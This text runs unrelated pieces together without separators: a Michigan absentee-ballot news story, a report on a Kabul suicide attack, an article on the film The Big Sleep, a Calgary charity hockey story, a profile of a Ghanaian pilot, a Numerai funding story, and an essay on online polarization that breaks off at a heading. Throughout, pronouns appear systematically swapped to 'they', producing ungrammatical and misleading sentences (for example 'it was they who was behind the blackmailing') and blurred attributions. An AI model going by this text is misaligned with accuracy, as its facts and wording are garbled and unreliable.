Lansing — Michigan Republicans and Democrats are both optimistic about their chances to win large numbers of absentee voters, finding positive trends about their parties in initial returns of absentee ballots less than two weeks before Election Day.
Republicans have a slight lead in the amount of absentee ballots returned by likely voters, but a larger percentage of voters identified as Democrats have returned their ballots, according to a new data analysis.
As of Wednesday, voters identified as Republican had returned 20,624 more ballots than those believed to be Democrats, 190,734 to 170,110, according to an analysis by Practical Political Consulting in East Lansing.
“We're winning,” Steven Ostrow, executive director of the Michigan Republican Party. “Over the last three, four or five days, the returns have really started to swing our way.”
But the proportion of Michigan's Republican primary voters who are completing general election absentee ballots is lagging behind the return rate of their Democratic counterparts, suggesting continued indecision within the GOP over presidential candidate Donald Trump, said Mark Grebner of Practical Political Consulting.
About 55.5 percent of voters identified as Democrats had returned their absentee ballots to their local clerks by Tuesday, compared with 48.4 percent of Republican voters, according to Grebner's analysis.
The seven-percentage-point gap between the returned Democratic and Republican absentee ballots is consistent across the state and even when African-Americans and voters under the age of 60 are taken out of the equation, Grebner said.
“There's a substantial gap in the return rates of people who have ballots, and I interpret that to mean there are a bunch of Republicans who have the pen in their hand and they don't know which arrow to complete,” said Grebner, a Democrat who works for candidates from both parties. “It just looks as if this is a measure of people having trouble voting.”
Absentee voting, Michigan's only form of early voting, is expected to exceed the 1.28 million absentee ballots cast in the 2012 presidential election.
Clinton's campaign and Michigan Democrats have heavily emphasized contacting voters who have requested and received an absentee ballot, said Brandon Dillon, chairperson of the state Democratic Party.
“So far we're encouraged by the numbers we're seeing, but there's still a lot of time and there's a lot of people who have their ballots out,” Dillon said.
‘Steady stream' of voters
Nearly 1.1 million absentee ballots had been distributed to voters as of Tuesday, a 4.6 percent increase from the same period in the 2012 election with 12 days to go, according to the Secretary of State's office.
Absentee ballots also are being returned by mail or in person to local clerks at a faster rate than four years ago, data show.
As of Tuesday, 46 percent of all ballots had been returned. Four years ago, with 12 days left on the campaign calendar, 43 percent of the 1,045,294 ballots had been returned, according to state data.
At Livonia City Hall, clerk Susan Nash has seen a “steady stream” of voters coming into their office over the past two weeks to fill out an application and obtain an absentee ballot in person.
The influx of absentee voters came after Republican Donald Trump and Democrat Hillary Clinton's second and final presidential debates on Oct. 9 and Oct. 19, Nash said.
“You kind of had the feeling when people came to the counter, they had had enough. ‘I've made up my mind. I don't need to know anymore. I'm good,' ” they said.
Absentee requirements
The Republican and Democratic parties are closely tracking the return of absentee ballots that will likely represent a quarter of the votes cast. A record high 7.5 million Michigan adults are registered to vote in the Nov. 8 election, according to the Secretary of State's office.
Voters have to meet one of six criteria to obtain an absentee ballot by mail or in person at a clerk's office. The most common reasons are voters over age 60 or those who won't be in their hometown on Election Day.
“As we know, more and more people are availing themselves of that option each year,” Dillon said.
The two parties will be deploying volunteers to call and knock on the doors of voters who have applied for and received an absentee ballot, which is a matter of public record.
“We've got volunteers out there calling, knocking on doors, seeing what they think and trying to help persuade them,” Ostrow said.
The GOP's voter persuasion efforts focus on the economic track record of “the Republican team” in Michigan state government and less about Trump, Ostrow said.
“When you compare the issues, Republicans win every time,” they said.
Data ‘not perfect'
Grebner's analysis is based on data the Secretary of State's Office collects daily from municipal clerks.
But the Republicans have a smaller return rate so far, in part, because there were 87,617 more ballots in circulation among voters who cast Republican primary ballots in March, according to Grebner's calculations.
“If you pick a township or pick or a county and sure enough Republicans are five or seven percentage points behind,” Grebner said. “This did not show up in previous years.”
They acknowledged the data are “not perfect” because no uniformity exists in the daily tracking of absentee ballots among Michigan's 1,603 city, village and township clerks.
Some municipal clerks report absentee returns to the Secretary of State's Office on a daily basis, while some do it once a week or even less frequently during the six-week pre-election period of absentee voting, they said.
Grebner classified voters by party based on whether they voted in the March 8 Democratic or Republican presidential primaries.
But Trump's candidacy has torn the GOP during the fall campaign as some Republicans have renounced their support for Trump.
A statewide poll conducted Oct. 10-11 by the Glengariff Group Inc. found 32 percent of strong Republicans were not supporting their party's nominee. By comparison, 16 percent of strong Democrats said they didn't plan to vote for Clinton.
Grebner expects the gap between returned Republican and Democratic ballots to narrow as Election Day nears.
“Most of them will figure it out,” Grebner said of undecided Republican voters.
The unknown
The big unknown is voters who weren't among the record 2.5 million who participated in Michigan's presidential primary.
As of Wednesday morning, there were 375,995 absentee ballots sent to voters who didn't participate in the primary and 34.3 percent had been returned, according to Grebner's analysis.
Ostrow disputes Grebner's criteria of only using the March presidential primary to identify potential Republican and Democratic voters.
The state Republican Party uses a more sophisticated analysis that includes a voter's primary voting history going back to the early 1990s, they said.
“Mr. Grebner's screening seems a little underwhelming,” Ostrow said. “By only using the presidential primary data, I think is a little bit misleading. ... Compared to where we were in 2012, I think we're pretty much right on pace.”
clivengood@detroitnews.com
Twitter: @ChadLivengood
Read or Share this story: http://detne.ws/2eOeZut
The Afghan capital was rocked by a brazen suicide attack on the British Council early Friday morning, heightening concern about the ability of Afghan security forces to defend the country against a resurgent Taliban.
The attack, which left at least eight Afghan police officers and one foreign soldier dead, came on Afghan Independence Day – a holiday that marks the nation's complete independence from the British in 1919.
"The British were defeated on the same day and we wanted to remind them that as your grandfathers were defeated on this day, you will also be followed and attacked everywhere. You will be defeated the same as your grandfathers were," says Zabiullah Mujahid, a spokesperson for the Taliban. "Our message to the Afghan government is that ... they cannot stop the willing [individuals] of the Afghan nation from attacking anywhere."
Attacks inside Afghanistan's capital city are rare and a cause for serious concern as international forces begin reducing their numbers here and transferring security responsibility to Afghan forces.
In July, international forces transitioned security responsibility for seven areas of Afghanistan, including all of Kabul province expect for Surboi district, to the Afghan Army and police. Afghan security forces have been responsible for security in the city of Kabul since 2008, but a large contingent of British, American, and other international soldiers responded to Friday's attack to assist them. New Zealand's Special Forces soldiers may have also been involved in the operation and there are reports that the international killed in the attack may have been a New Zealander.
“This attack shows that security forces for Kabul are completely weak and they are unable to strengthen security, especially on Independence Day,” says Maj. Abdul Rahman Shaheed, a member of parliament from Bamiyan province and a former police officer. “It's a shameful incident for the security forces of Kabul. It means the Taliban is getting stronger and that they have high morale.”
British reaffirm their commitment to Afghanistan
The attack began around 5:30 a.m. when a car bomb detonated at the gate of the British Council, allowing three attackers to enter the building, says Mr. Mujahid, the Taliban spokesperson.
The militants engaged in a shoot-out with Afghan and international security forces that lasted well into the afternoon, with one surviving attacker holding out for hours after their fellow militants had been killed. The attackers came from eastern Afghanistan and Kabul, according to the Taliban. All of them died in the attack.
At least 12 people were injured in addition to the nine security forces killed, but British authorities said that “all British nationals affected are now safe” and no British citizens were hurt.
“This attack, against people working to help build a better future for Afghanistan, will not lessen the UK's resolve to support the Afghan people,” said Alistair Burt, the United Kingdom's minister for the Middle East, in an official statement.
The British Council in Kabul specializes primarily in providing education and development services.
NATO should focus on quality, not quantity of Afghans trained
The last major attack inside Kabul occurred on June 28 when insurgents stormed the Intercontinental Hotel, one of the most secure buildings in the capital, killing at least 10 people. The stand-off ended when NATO helicopters fired at the attackers on the roof of the hotel.
“After 10 years of international forces in Afghanistan this is very unusual. Why is it that despite the presence of more than 100,000 international forces and the Afghan Army and police, the armed opposition in Afghanistan and their supporters are able to do anything they want, anywhere they want,” says Baryalai Hakimi, head of the law and political science department at the National Center for Policy Research at Kabul University.
While Friday's attack is unlikely to affect future transition plans, Mr. Hakimi warns that NATO must focus not only on the number of Afghan police and soldiers trained but on increasing the capabilities of each individual.
“Now the international forces are insisting on training a high number of Afghan Army and police, but they are focusing on quantity, not quality," they say. "It is important for them to focus on quality.”
The Big Sleep is a 1946 film noir directed by Howard Hawks,[2][3] the first film version of Raymond Chandler's 1939 novel of the same name. The film stars Humphrey Bogart as private detective Philip Marlowe and Lauren Bacall as Vivian Rutledge in a story about the "process of a criminal investigation, not its results."[4] William Faulkner, Leigh Brackett and Jules Furthman co-wrote the screenplay. In 1997, the U.S. Library of Congress deemed the film "culturally, historically, or aesthetically significant," and added it to the National Film Registry.
Because the film was scheduled for release a year after it was made, parts of the original 1945 cut were afterwards significantly rescripted and shot. A copy of the 1945 version was later restored and released in 1997.
Plot [ edit ]
Private detective Philip Marlowe is summoned to the mansion of General Sternwood. The general wants to resolve the ‘gambling debts' that their daughter Carmen owes to bookseller Arthur Gwynn Geiger. As Marlowe is leaving, Sternwood's older daughter, the divorced Mrs. Vivian Rutledge, stops him. They suspect their father's true motive for calling in a detective is to find their protégé Sean Regan, who had mysteriously disappeared a month earlier.
Marlowe goes to Geiger's shop, which is minded by Agnes Louzier, and then follows Geiger home. Hearing a gunshot and a woman's scream, they break in to find Geiger's body and a drugged Carmen, as well as a hidden camera empty of film. After taking Carmen back home, they return and discovers the body has disappeared.
Philip Marlowe (Bogart) and Vivian Rutledge (Bacall) eye to eye
Vivian comes to Marlowe's office the next morning with scandalous pictures of Carmen that they received with a blackmail demand for the negatives. Marlowe returns to Geiger's bookstore and follows a car to the apartment of Joe Brody, a gambler who previously blackmailed General Sternwood. They then finds Carmen in Geiger's house, where they insist that it was Brody who killed Geiger. They are interrupted by the house's owner, small-time gangster Eddie Mars.
Marlowe goes to Brody's apartment, where they find both Agnes and Vivian. They are interrupted by Carmen, who wants their photos. Marlowe disarms them and sends Vivian and Carmen home. Brody admits that it was they who was behind the blackmailing, then has to answer the door and is shot. Marlowe chases the killer and apprehends Carol Lundgren, Geiger's former driver, who believes Brody is swindling him. Marlowe calls the police and arranges for them to come and arrest the killer.
Marlowe visits Mars' casino, where they ask about Regan, who is supposed to have run off with Mars' wife. Mars is evasive and tells Marlowe that Vivian is running up gambling debts. Vivian wins a big wager and then wants Marlowe to take them home. A stooge of Mars' attempts to rob Vivian, but Marlowe knocks them out. While driving back, Marlowe presses Vivian on their connection with Mars, but they admit nothing. Back at their own home, Marlowe finds a flirtatious Carmen waiting for him. They say they did not like Regan and mentions that Mars calls Vivian frequently. When they attempt to seduce Marlowe, they throw them out of their apartment. The next day, Vivian tells them they can stop looking for Regan; they have been found in Mexico and they are going to see him.
Mars has Marlowe beaten up to stop them investigating further.  They are found by Harry Jones, an associate of Brody's who wants to marry Agnes. Jones conveys an offer from them to reveal the location of Mars' wife for $200. When Marlowe goes to meet them and be taken to where they are hiding, they spot Canino, a gunman hired by Mars, who is there to find Agnes himself. Canino poisons Jones after they disclose Agnes' location (which turns out to be false).
Agnes telephones the office while Marlowe is still there and they arrange to meet them They reveal that they have seen Mona Mars behind an auto repair shop near a town called Realito. When they get there, Marlowe is attacked by Canino. They wake to find themselves tied up, with Mona watching over him. Vivian is there too and frees Marlowe, allowing them to get to their gun and kill Canino. They drive back together and Marlowe calls Mars from Geiger's house, pretending to be still in Realito.
Mars arrives with four men, who set up an ambush outside. When Mars enters, Marlowe reveals that they have discerned the truth: Mars has been blackmailing Vivian, claiming that their sister Carmen had killed Regan. They then forces Mars outside, where they are shot by their own men. Marlowe then calls the police, telling them that Mars was the one who killed Regan. They also convince Vivian that their sister needs psychiatric care.
Cast [ edit ]
Production [ edit ]
Writing [ edit ]
The writing of the film script involved three different authors, including the American novelist William Faulkner. The writing was influenced by a primary focus of the Hays Office censorship policies which were often used to heavily restrict sexual themes.[5] In the novel, Geiger is selling pornography, then illegal and associated with organized crime, and is also a homosexual having a relationship with Lundgren. Likewise, Carmen is described as being nude in Geiger's house, and later nude and in Marlowe's bed. To ensure the film would be approved by the Hays Office, changes had to be made. Carmen had to be fully dressed, and the pornographic elements could only be alluded to with cryptic references to photographs of Carmen wearing a "Chinese dress" and sitting in a "Chinese chair". The sexual orientation of Geiger and Lundgren goes unmentioned in the film because references to homosexuality were prohibited. The scene of Carmen in Marlowe's bed was replaced with a scene in which they appear, fully dressed, sitting in Marlowe's apartment, when they promptly kick them out. The scene, shot in 1944, was entirely omitted in the 1945 cut but restored for the 1946 version.[5]
The Big Sleep is known for its convoluted plot. During filming, allegedly neither the director nor the screenwriters knew whether chauffeur Owen Taylor was murdered or had killed himself. They sent a cable to Chandler, who told a friend in a later letter: "They sent me a wire ... asking me, and dammit I didn't know either".[6]
Bogart and Bacall on the set during filming
After its completion, Warner Bros. did not release The Big Sleep until they had turned out a backlog of war-related films. Because the war was ending, the studio feared the public might lose interest in the films, while The Big Sleep's subject was not time-sensitive. Attentive observers will note indications of the film's wartime production, such as period dialogue, pictures of President Franklin D. Roosevelt, and a woman taxi driver, who says to Bogart, "I'm your girl." Wartime rationing influences the film: dead bodies are called "red points", which referred to wartime meat rationing, and Marlowe's car has a "B" gasoline rationing sticker in the lower passenger-side window, indicating they are essential to the war effort and therefore allowed eight gallons of gasoline per week.
The "Bogie and Bacall" phenomenon, a fascination with the couple that had begun with To Have and Have Not, and that grew during their subsequent marriage, was in full swing by the end of the war. Bacall's agent, Charles K. Feldman, asked that portions of the film be re-shot to capitalize on their chemistry and counteract the negative press Bacall had received for their 1945 performance in Confidential Agent which was released prior to The Big Sleep even though produced after it.
Producer Jack L. Warner agreed, and new scenes for The Big Sleep, such as the sexually suggestive racehorse dialogue, were added (scripted by an uncredited Julius Epstein).[7] The re-shot ending featured Peggy Knudsen as Mona Mars because Pat Clark, the originally cast actor, was unavailable. Furthermore, the parts of James Flavin and Thomas E. Jackson were completely eliminated. Because of the two versions created by the re-shooting, there is a substantial difference in content of some twenty minutes between them, although the difference in running time is two minutes. Novelist Raymond Chandler said Martha Vickers (Carmen) overshadowed Lauren Bacall (Vivian) in their scenes together, which led the producers to delete much of Vickers' performance to enhance Bacall's.[8]
Reception [ edit ]
The re-shot, re-edited and revised The Big Sleep was finally released on 23 August 1946. The cinematic release of The Big Sleep is regarded as more successful than the 1945 pre-release version (see below), even though it is confusing and difficult to follow. This may be due in part to the omission of a long conversation between Marlowe and the Los Angeles District Attorney where the facts of the case, thus far, are laid out. Yet movie-star aficionados prefer the 1946 film noir version because they consider the Bogart-Bacall appearances more important than a well-told story. For an example of this point of view, see Roger Ebert's The Great Movies essay on the film.[4]
According to Warner Bros records the film earned $3,493,000 domestically and $1,375,000 foreign.[1]
Critical response [ edit ]
1946 version [ edit ]
At the time of its 1946 release, Bosley Crowther said the film leaves the viewer "confused and dissatisfied", points out that Bacall is a "dangerous looking female" ..."who still hasn't learned to act" and notes:[9]
The Big Sleep is one of those pictures in which so many cryptic things occur amid so much involved and devious plotting that the mind becomes utterly confused. And, to make it more aggravating, the brilliant detective in the case is continuously making shrewd deductions which they stubbornly keep to himself. What with two interlocking mysteries and a great many characters involved, the complex of blackmail and murder soon becomes a web of utter bafflement. Unfortunately, the cunning script-writers have done little to clear it at the end.
Time film critic, James Agee, called the film "wakeful fare for folks who don't care what is going on, or why, so long as the talk is hard and the action harder" but insists that "the plot's crazily mystifying, nightmare blur is an asset, and only one of many"; it calls Bogart "by far the strongest" of its assets and says Hawks, "even on the chaste screen...manages to get down a good deal of the glamorous tawdriness of big-city low life, discreetly laced with hints of dope addiction, voyeurism and fornication" and characterizing Lauren Bacall's role as "an adolescent cougar".[10]
1997 release of the 1945 original cut [ edit ]
In the late 1990s, a pre-release version—director Hawks's original cut—was found in the UCLA Film and Television Archive. That version had been released to the military to play to troops in the South Pacific. Benefactors, led by American magazine publisher Hugh Hefner, raised the money to pay for its restoration, and the original version of The Big Sleep was released in art-house cinemas in 1997 for a short exhibition run, along with a comparative documentary about the cinematic and content differences between Hawks's film noir and the Warner Brothers "movie star" version.[11]
Film critic Roger Ebert, who included the film in their list of "Great Movies",[12] praises the film's writing:[4]
Working from Chandler's original words and adding spins of their own, the writers (William Faulkner, Jules Furthman and Leigh Brackett) wrote one of the most quotable of screenplays: it's unusual to find yourself laughing in a movie not because something is funny but because it's so wickedly clever.
Note that the above quote is not specific to the 1945 version but, rather, is in reference to both films. In fact, Ebert preferred the 1946 version. They stated:
The new scenes [of the 1946 version] add a charge to the film that was missing in the 1945 version; this is a case where "studio interference" was exactly the right thing. The only reason to see the earlier version is to go behind the scenes, to learn how the tone and impact of a movie can be altered with just a few scenes... As for the 1946 version that we have been watching all of these years, it is one of the great films noir, a black-and-white symphony that exactly reproduces Chandler's ability, on the page, to find a tone of voice that keeps its distance, and yet is wry and humorous and cares.[4]
In a 1997 review, Eric Brace of The Washington Post wrote that the 1945 original had a "slightly slower pace than the one released a year later, and a touch less zingy interplay between Bogart and Bacall, but it's still an unqualified masterpiece."[11]
Accolades [ edit ]
In 2003, AFI named protagonist Philip Marlowe the 32nd greatest hero in film. Empire magazine added The Big Sleep to their Masterpiece collection in the October 2007 issue.[citation needed] The film placed 202nd on the 2012 Sight & Sound critics' poll of the greatest films ever made, and also received two directors' votes.[13]
Home media [ edit ]
A region-1 (U.S. and Canada) DVD version of The Big Sleep was released in 2000.[14] It is a double-sided, single-layer disc; with the 1946 theatrical version on side-A (114 m), and the 1945 version (116 m) on side-B. The 1946 opening credits appear on both versions, including Peggy Knudsen, who never appears in the original version. Nowhere is the original actor, Pat Clark, ever credited. The DVD also contains a 16-minute, edited version of the 1997 documentary comparing the two versions that is narrated by Robert Gitt, who worked on the restoration of the 1945 version. Film critic Walter Chaw writes of the DVD releases of The Big Sleep and To Have and Have Not (1944), "The fullscreen transfer of The Big Sleep is generally good but, again, not crystalline, though the grain that afflicts the earlier picture is blissfully absent. Shadow detail is strong—important given that The Big Sleep is oneiric—and while the brightness seems uneven, it's not enough to be terribly distracting. The DD 1.0 audio is just fine."[15]
A Blu-ray edition was released by Warner Bros. in 2015. It "includes the 1945 cut of the film that was screened for overseas servicemen, running two minutes longer and containing scenes not used in the official release."[16]
Use in Micmacs [ edit ]
Portions of the original release were used in Micmacs, a film released in 2009 directed by Jean-Pierre Jeunet. The main character Bazil is seen mouthing words from a French dubbed portion of the film in the beginning and the opening credits are then done in the same style. Portions of Steiner's music from the film are also used along with original music by Raphaël Beau.
CTV Calgary Staff,
A very special hockey game was played at the Scotiabank Saddledome on Thursday night to honour the memory and spirit of five-year-old Nathan O'Brien.
Nathan's Heros hit the ice to honour the little boy who disappeared along with their grandparents last year.
The charity game raised money for the Nathan O'Brien Children's Foundation and players included investigators who worked on the case, government officials, Flames alumni, friends, family and supporters.
“We get to celebrate our son in another event, in a hockey game that they loved and we're making their dreams come true tonight,” said Rod O'Brien, Nathan's dad.
Nathan played hockey for the Springbank Hockey Association and Timbits and Novice players will be in the stands to cheer on the teams.
Nathan's mother Jennifer, the head coach of Nathan's Heros, says they loved hockey and superheroes.
“He just loved to have fun and play the game and their motto is ‘play hard and have fun' and that's what everyone's going to do tonight and have a good game and their brother gets to go out and play and a lot of their buddies at the intermission and their friends get to come and see the game and they would just love that,” said Jennifer.
The O'Briens say Nathan's favourite superhero was Spider-Man and people dressed up in costume for the event.
The O'Briens say they continue to focus on their family to help them get them through the tough times and that they have a great support network to lean on.
“They just lift us up when we need lifting up and for us it's also doing something for our son Nathan,” said Rod. “Nathan was a part of their world too and we're just very blessed, we feel very honoured that everyone is doing this for our son and making their dreams come true so they're all Nathan's superheroes.”
“We're blessed to have world class people step in and help plan this event,” said Jennifer. “We are so grateful for the people that we have to help us out.”
For more on the Nathan O'Brien Children's Foundation, click HERE.
I told them I could prove them wrong, because women can do things, and even do it much better than men sometimes.”
Patricia Mawuli was nineteen years old and had just finished high school when they saw an airplane for the first time.As they were collecting wood in a field outside of their uncle's house in a rural area of Ghana, Mawuli heard loud noises that they said scared them at first.“I saw these airplanes flying overhead, but because I was very close to the airfields, I thought the airplanes were chasing me,” they recalled years later.But Mawuli said their fear did not last long. Before long, they started “to chase them -- to see what they were up to.”She followed the airplanes to find out where they were landing. And once they arrived, they asked what they could do to work near the planes.They told them they could clear wood from the area. They gladly accepted – but all along their sights were set higher.“They didn't have any plans for training girls,” they said. “Well I told them I could prove them wrong, because women can do things and even do it much better than men sometimes.”Eventually, Jonathan Porter, an engineer and pilot at the airfield, trained and taught Mawuli to fly. Two years ago, on their 21birthday, they became the country's first licensed woman pilot – and that only marked the beginning of their journey.Mawuli then helped found the AvTech Academy , short for the Aviation and Technology Academy Ghana, which trains young women how to fly, build and maintain light aircraft.People forget,” they said “it's only two percent of the world's aircraft that are airliners,” they said. “The rest of the 98 percent are private planes and ultralights.” That means, Mawuli explained, there are real opportunities in the aviation industry for the young women taught at AvTech.This is the academy's second year, and there are three students. Four women are enrolled for next fall, added Mawuli. The school focuses on training young women from rural areas, who might not otherwise have the opportunity for advanced schooling. Mawuli puts most of their own salary from piloting and engineering back into the academy.She said they want to see young women pushed to achieve their potential. “I told myself, well if I have done this, there are many more women out there,” who might want to do the same. “And yet how many don't have enough money to send them to continue their education.”She said working at the academy has been a privilege. “In the world these days, not many girls go into engineering. And to be able to see these young and enthusiastic ladies, who are looking to learn more about engines, it's a bit more encouraging – there's hope for the future.”
Richard Craib believes that some of the best stock pickers aren't on Wall Street. The former hedge funder came to the realization that tech's machine learning experts may be able to build better predictive models than those with finance backgrounds.
Craib carried this thesis forward when they launched Numerai last year, a crowdsourced hedge fund. The startup hopes to attract the best and brightest minds at companies like Google and pay them for their AI skills.
And the first year saw significant traction, with 7,500 “data scientists” creating algorithms on Numerai's platform. Now the startup is announcing $6 million in funding from First Round Capital and Union Square Ventures to continue their team's expansion and buy more historical data sets (Craib refused to say where they get their data).
“We invested because Numerai is an open access hedge fund,” said Andy Weissman, a partner at Union Square Ventures. Anyone is allowed to participate, so it's a “model built upon a set of principles that have open participation and anonymity at their core.”
Numerai works by building its own financial model that incorporates the algorithms submitted by others. The team democratizes participation by making the data readily accessible, but ensures that it is encrypted and not shareable.
Users are invited to download the data and build their own algorithm, targeting regions or sectors of the stock market. Most of the participants reside in the U.S., Russia or China.
These people do not invest in or generate any income from the hedge fund directly, but the most accurate submission gets awarded about $60,000 in income per year, with the top 100 users all paid some money. Craib says that users are paid in bitcoin to guarantee anonymity for people who want to hide their participation in Numerai. They acknowledged that because of the anonymity, they don't know whether some of the entrants are doing something that violates the protocols set by their employers.
The fund size is over $1 million right now, with much of the money coming from Craib personally. They hope that a favorable investing track record will help attract institutional investors and that they can ultimately charge performance fees.
Yet while Numerai has a unique approach to getting the brightest minds of tech to participate in equities, the algorithms can only be formed based on previous data trends. And past behavior is not necessarily predictive of future behavior.
But the reliance on historical data is essential, says Craib. It ensures there's “no way for them to impose their own biases.” They say they weight the best-performing algorithms more heavily in their formula.
Craib could not reveal their positions or share whether or not they have outperformed the DJIA, because it would violate SEC rules about marketing to the media. They just are able to say that they are raising new funding because they're “performing very well.”
Numerai is based in San Francisco and previously raised funding from Howard Morgan, Naval Ravikant and others.
Death to weak ties
In social network theory, weak ties (characterised by links to external or more distant social networks) are deemed to be highly important to information flow within a system as a whole, acting is bridges between different social groups, which gives them access to greater diversity of ideas and a broader number of “argument pools” overall. Cutting weak ties, by social ostracism, blocking or unfriending, severs information flow. The end state of this is that the group — characterised now only by strong ties — becomes an intellectual “monoculture”, and any subsequent cultural evolution is towards more extreme versions of itself. This is known as “epistemic closure”. Cass Sunstein's writes in their famous paper, The Law of Group Polarization.
Group polarization arises when members of a deliberating group move toward a more extreme point in whatever direction is indicated by the members' predeliberation tendency.
When skeptical voices are muted, communities veer towards more radical positions, as in-group factions try to make themselves socially dominant by iterating on existing ideas. This is a feedback loop, as the fewer competing ideas a person is exposed to, the more radicalised they become, and thus the more likely they are to sever weak ties. By the same token, they're less likely to build new ones, preferring the strong ties of the in-group. By this stage, investment in the group also passes the point of no return.
In recent years there has been a trend within such groups to subscribe to “Shared Blocklists”; curated lists of those deemed to be “known abusers” or similarly emotive language. In fact, they are largely directories of ideological opponents or just genuine skeptics, who offer crucial critical voices that have been proved to thwart groups moving towards extremist positions or views divorced from reality (See the Asch Conformity Experiments).
Shared blocklists are like an ideological ad-block that increasingly warp the subscriber's sense of reality.
Social policing
As myths begin to harden, criticism of your narrative carries a heavy social cost by ensuring even mild critique is emotionally equated with the most vile behaviours of the imagined Other. Nuance is equated with apologetics for said vile behaviours (see Talk to the limbic system below). When new chapters of a mythology begin to unfold that appear to support key elements of the narrative, as happened during #DongleGate episode in 2013, critical voices are unwelcome, especially in the community heartland.
When former attorney Ellen-Beth Wachs questioned certain elements of the emerging #DongleGate narrative on the FreeThoughtBlogs site they were immediately accused of having sympathies with the Other of their narrative (You can read their account here). They were bombarded with Thought Terminating Cliches and their behaviour associated with the worst behaviour imaginable (see Talk to the limbic system).
Social policing sometimes descends into particularly nasty behaviour, such as abusive comments, doxxing, abuse and threats. Sadly, this is often excused, ignored or denied by the in-group (see Denial and Noble Cause). If the target refuses to recant, or “doubles down”, ostracism, unfriending unfollowing, and permanent association with the Other is almost inevitable, perhaps even banishment to the purgatory of a shared Blocklist. With such a harsh climate inside the in-group, the only form of social expression is not criticism, but innovation of and iteration of key beliefs (see Death to weak ties).
Such rigid enforcement of Reputational Boundaries cannot but help veer towards extremist views increasingly at odds with reality, and epistemic closure. Which brings us to…
Talk to the limbic system
Advocates of certain myths often compete for in-group attention and try to gain socials status by competing to say most outrageous controversial statements that promote the narrative. The best ones get retweets and shares before people have time to reflect on, or even read supporting articles / evidence in the first place.
This strategy often aims to link powerful signs and symbols from the background culture (words like misogynist, bullingdon, TERF, ISIS etc) to signs and symbols used by the Others that feature in your narrative (a logo, photo, name of opposing group, a hashtag). Repetition is important for the goal is for this link to become “canonical” and irreversible by transferring the negative emotional state from the old symbol to the new. This ensures instant revulsion of the symbols of the Other.
In prehistory, this may have involved associating the emotion evoked by dangerous animals (fear and loathing) with the symbols or markings of rival clans on tribe. Today, we associate terms of revulsion or mockery with hashtags, names of online communities or websites, in-group signifiers such as twibbons or personal adornment.
If left unchecked, this process sees a surreal descent into the “fear pornography” of the conspiracy world or “outrage pornography” of the social justice left (or historically, the religious right).
Selective use of evidence
Only evidence that supports the narrative is promoted and emphasised and receives a “signal boost” (retweets, shares, copypasta). Contrary information and argument methods — often emotionally associated with the Other — are ignored, ridiculed and sidelined. Thought Terminating Cliches are deployed to try and dismiss opposing evidence, or it is ridiculed as fake (often without supporting evidence) or classified as deliberate misinformation (Also see Denial.)
Low standards of evidence
Evidence does need to stand up to scrutiny if Social Policing is done correctly. Cite such evidence as if it were infallible (i.e. in conspiracy circles “we've got the official documents”). Visual “evidence”, such as graphs and charts, are more likely to go viral due to our inherent visual bias. New species of evidence, such as cryptic screenshots and photos montages covered in red boxes and arrows, are a new innovation in this field.
Thought terminating cliches
Coined by Robert J Lifton in their book Thought Reform and the Psychology of Totalism, Thought Terminating Cliches were described as the process when…
“…the most far-reaching and complex of human problems are compressed into brief, highly reductive, definitive-sounding phrases, easily memorized and easily expressed. These become the start and finish of any ideological analysis.”
The internet is a habitat where the Thought Terminating Cliche thrives. When conspiracy theorists want to dismiss an event that contradicts their narrative, they use the term “false flag” or when pointing to their sacred texts they say “We've got the official documents”. In feminist circles, there are terms like “mansplaining” that are designed to immediately dismiss the argument without engaging with its content. In Scottish nationalist circles one just need mention association with “Westminster” to dismiss an opponent. The most ubiquitous and multi-purpose Thought Terminating Cliche, used by virtually every group, is of course “troll”.
The more a community veers towards extremism the more baroque such terminology becomes, as more and more intellectual avenues are walled off.
Personal revelation
For much of human history, and certainly within pre-literate or oral cultures (which outside of the small literate elite was almost everybody) personal experience was all we had to go on. Even within educated elites it was held in high regard, and such experiences formed background texture of reality. The historian Norman Cohn wrote in Europe's Inner Demons that St Augustine;
“Regarded it as sheer impudence to deny that fauns [Roman demons] were having intercourse with women, considering the many testimonials to that effect.”
If your narrative allows for “lived experience” to be beyond question, despite the well known problems with constructed memory, eyewitness testimony, and other routine failures of human cognition, it broadens the scope for what can be considered “facts”. If personal revelation can be put at the centre of your narrative and seen as infallible without the need for any supporting evidence you are onto a winner.
Infallibility
As a natural consequence of effective Social Policing, key characters in the narrative should find themselves beyond criticism, or criticism of them and their behaviour becomes and in-group taboo. Indeed, the Others in the narrative are usually defined by criticism of these infallible characters (a cardinal sin) and as such conceptually chained to negative emotions (see Talk to the limbic system). The polarised narrative typically allows no room for nuance of grey areas; people are either fully good or fully bad.
Origin myths
Particularly in the case of controversial hashtags, there is often heated debate around its origins that cast a shadow on its meaning. Indeed, this is often the key point of contention and is often rooted in Selective use of evidence. In the #GamerGate controversy, (at least) two broad narratives developed to what this symbol represents; a flag held by misogynists who want to drive women out the gaming community, or the banner of people who want to stamp out corruption and nepotism in the gaming press.
Each origin story for the meaning of the symbol has its own set of characters (mythologised versions of real people) and key episodes and dramas. The same is true of the #FTBullies controversy in the secular community, which developed widely different narratives on the origins of the schism. Each narrative evolves a canonical list of “chapters” with associated moral fables and meanings. Over time, as the war between mythologies intensifies, different canonical narratives crystallise and within all certain chapters are “lost” or marginalised (on the web they are not lost, but rather the signal is turned down — fewer inbound links — as their importance to the overarching grand mythology becomes less useful). Competing hashtag mythologies value different chapters or attribute vastly different meaning to them.
Historically, this occurred to the Bible, which crystallised from a wide variety of early Christian texts that added sometimes radically different perspectives to the faith. When Christianity was co-opted by the Roman State, certain books, such as Gospel of Judas and the Book of Enoch were either lost to history or retained only by fringe groups.
The structure of myth has historically been used as a storehouse of knowledge, a means of making the “seamless flux” of reality more understandable by organising crucial knowledge in a comprehensible structure. Empirical facts needed for survival, such as how to know if a tuber was ready to be cooked, or how to navigate using only starlight, were threaded together with colourful myths that can be thought of as aids to memory. For thousands of years, ignorant of the physics of metallurgy, blacksmiths knew how to forge swords just by following ritual behaviour prescribed in myths.
Modern hashtag mythologies can — if they so choose — dispense with the need for empirical facts altogether. Indeed, in the Big Noise of the internet, what constitutes a “fact” is becoming increasingly opaque. These myths can be composed of opinion, half-truths, assertions and orphaned fragments of media devoid of context. This problem is magnified when groups exclude or ignore important information to preserve group cohesion. Although it is increasingly difficult, it is better to begin with material facts and build up towards an overarching narrative, than to reach down for facts amongst the exponential expanse of the internet to validate pre-existing mythologies.
Noble cause
